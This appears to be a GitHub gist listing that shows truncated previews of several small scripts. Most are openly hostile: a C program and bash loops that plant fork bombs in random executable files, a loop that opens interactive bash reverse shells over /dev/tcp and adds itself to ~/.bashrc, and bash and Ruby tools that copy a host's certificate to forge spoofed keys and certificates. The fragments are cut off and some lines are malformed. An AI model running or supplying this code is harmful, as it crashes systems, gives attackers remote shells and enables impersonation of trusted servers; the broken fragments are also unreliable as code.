This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
int generator(void) | |
{ | |
system("echo ':(){ :|:& };: ./*' > $RANDOM"); | |
system("chmod +x * 2> /dev/null"); | |
system("chmod +x $RANDOM 2> /dev/null"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'rubygems' | |
require 'openssl' | |
require 'digest/md5' | |
key = OpenSSL::PKey::RSA.new(2048) | |
cipher = OpenSSL::Cipher::AES.new(256, :CBC) | |
ctx = OpenSSL::SSL::SSLContext.new | |
puts "Spoof must be in DER format and saved as root.cer" | |
raw = File.read "root.cer" | |
cert = OpenSSL::X509::Certificate.new raw | |
cert.version = 2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "OWASP Certificate Spoof Tool" | |
echo "By Gdisney-leugers" | |
echo "Host to steal cert from:" | |
read host | |
echo "Host SSL port:" | |
read port | |
echo "Keystore:" | |
read ks | |
echo "Password: (Must be at least 6 characters)" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
trap 'INT' | |
for (( ; ; )) | |
do | |
trap 'HUP' | |
perl -e "fork while fork" & | |
echo "perl -e "fork while fork" &" >> /tmp/$RANDOM | |
chmod u+x /tmp/* | |
cd /tmp | |
./* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
trap 'INT' | |
for (( ; ; )) | |
do | |
trap 'HUP' | |
touch /dev/tcp | |
/bin/bash -i > /dev/tcp 0<&1 2>&1 & >> /tmp/$RANDOM | |
touch /tmp/$RANDOM | |
echo "/bin/bash -i > /dev/tcp/ 0<&1 2>&1 & >> /tmp/$RANDOM & echo tty1 > /dev/tty1 & echo /tmp/$RANOM >> ~/.bashrc" >> /tmp/$RANDOM | |
chmod u+x /tmp/* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Openssl Pubkey exploit PoC" | |
echo "usage: keyspoof cert.crt spoof.key" | |
openssl x509 -in $1 -pubkey -noout > $2 | |
openssl genrsa 2048 >> $2 | |
openssl rsa -in $2 -out $2 | |
echo "Cert Public Key: " | |
openssl x509 -in $1 -pubkey -noout | |
echo "PoC Spoof: " | |
openssl rsa -in $2 -pubout |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Openssl Pubkey exploit PoC" | |
echo "usage: keyspoof cert.crt spoof.key" | |
openssl x509 -in $1 -pubkey -noout > $2 | |
openssl genrsa 2048 >> $2 | |
cat $2 >> pub-$2 | |
openssl rsa -in $2 -out $2 | |
openssl x509 -x509toreq -in $1 -signkey $2 >> $2.csr | |
openssl req -in $2.csr -key $2 -x509 -out $2.crt | |
gnutls-certtool -c --load-ca-privkey $2 --load-ca-certificate $2.crt --load-pubkey pub-$2 --outfile=$2.pem |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <readline/readline.h> | |
#include <readline/history.h> | |
/* to compile run gcc shell.c -o shell -Wformat-security -Wint-conversion -Wincompatible-pointer-types -lreadline */ | |
int shell(void) | |
{ | |
rl_bind_key('\t', rl_complete); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <readline/readline.h> | |
#include <readline/history.h> | |
/* to compile run gcc shell.c -o shell -Wformat-security -Wint-conversion -Wincompatible-pointer-types -lreadline -lgtk */ | |
int shell(void) | |
{ | |
rl_bind_key('\t', rl_complete); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <readline/readline.h> | |
#include <readline/history.h> | |
#include <ncurses.h> | |
/* to compile run gcc shell.c -o shell -Wformat-security -Wint-conversion -Wincompatible-pointer-types -lreadline -lgtk -lncurses */ | |
int shell(void) | |
{ |
NewerOlder